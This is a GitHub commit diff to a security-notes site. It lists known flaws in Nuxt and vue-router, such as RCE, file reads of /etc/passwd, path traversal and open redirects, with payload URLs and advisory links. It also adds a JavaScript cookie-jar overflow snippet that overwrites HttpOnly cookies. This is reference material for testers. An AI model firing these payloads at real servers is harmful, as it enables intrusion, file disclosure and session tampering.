add opr and cookie

xanhacks · Dec 12, 2023 · c6c903a · c6c903a
1 parent b4272e1
commit c6c903a
Show file tree

Hide file tree

Showing 3 changed files with 37 additions and 4 deletions.
diff --git a/content/en/docs/framework/nuxt.md b/content/en/docs/framework/nuxt.md
@@ -19,20 +19,26 @@ toc: true
 
 ## Vulnerabilities
 
-### Remote Code execution 
+### Remote Code Execution 
 
 - `http://localhost:3000/__nuxt_component_test__/?path=data%3Atext%2Fjavascript%2Cconsole%2Elog%28%22hello%21%22%29%3B`
 - Version: <= v3.4.0-2 (development server)
 - [Huntr -  RCE in developer mode in nuxt/nuxt](https://huntr.dev/bounties/1eb74fd8-0258-4c1f-a904-83b52e373a87/)
 
-### Abritrary file read
+### Abritrary File Read
 
 - `http://localhost:3000/__nuxt_vite_node__/module//bin/passwd`
 - Version: 3.0.0-RC8 - 3.4.1 (development server)
 - [Huntr - (Almost) Arbitary File Read on Development Server in nuxt/nuxt](https://huntr.dev/bounties/7840cd32-af15-40cb-a148-7ef3dff4a0c2/)
 
-### Path traversal
+### Path Traversal
 
 - http://localhost:3000/_nuxt/@fs/etc/passwd
 - Version: <= rc12 (development server)
 - [Huntr - Dev mode Path traversal in nuxt/framework](https://huntr.dev/bounties/4849af83-450c-435e-bc0b-71705f5be440/)
+
+### Open Redirect
+
+- https://nuxtjs.org///bing.com
+- Version: <= 2.15.7
+- [Github Issues - Three slashes linking to external website](https://github.com/nuxt/nuxt/issues/9992)
diff --git a/content/en/docs/framework/vuejs.md b/content/en/docs/framework/vuejs.md
@@ -38,4 +38,12 @@ h('div', { innerHTML: this.userProvidedHtml })
 <h1 :style="userProvidedStyles">Title</h1>
 ```
 
-> Source: [VueJS - Security](https://vuejs.org/guide/best-practices/security.html)
+> Source: [VueJS - Security](https://vuejs.org/guide/best-practices/security.html)
+
+## vue-router
+
+### Open redirect using `///`
+
+- Example: `https://example.com///attacker.com`
+- Details: [vuejs/vue-router/pull/3652](https://github.com/vuejs/vue-router/pull/3652)
+- Version: <= 3.5.2
diff --git a/content/en/docs/http/cookie.md b/content/en/docs/http/cookie.md
@@ -45,11 +45,30 @@ The `SameSite` attribute controls when cookies are sent to the server based on t
 
 > More at [MDN - SameSite](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Set-Cookie#samesitesamesite-value) and [Article - SameSite confusion](https://jub0bs.com/posts/2021-01-29-great-samesite-confusion/).
 
+## Cookies scope on different ports
+
+This three domains will share the same cookies even if `SameSite` is `Strict`:
+
+- http://example.com
+- http://example.com:5555
+- https://example.com
+
 ## Cookie Ordering
 
 - Arranged alphabetically based on their names
 - Sorted by their paths in alphabetical sequence (root path `/` is first)
 
+## Cookie Jar Overflow - Overwriting HttpOnly cookies
+
+```js
+for (let i = 0; i < 700; i++) {
+    document.cookie = `cookie${i}=${i}`;
+}
+document.cookie = "<httpOnlyCookie>=overwritten by JavaScript";
+```
+
+- [_demo/cookie.php](https://github.com/Sjord/Sjord.github.io/blob/master/_demo/cookie.php)
+
 ## Set-cookie from Javascript
 
 ### Chrome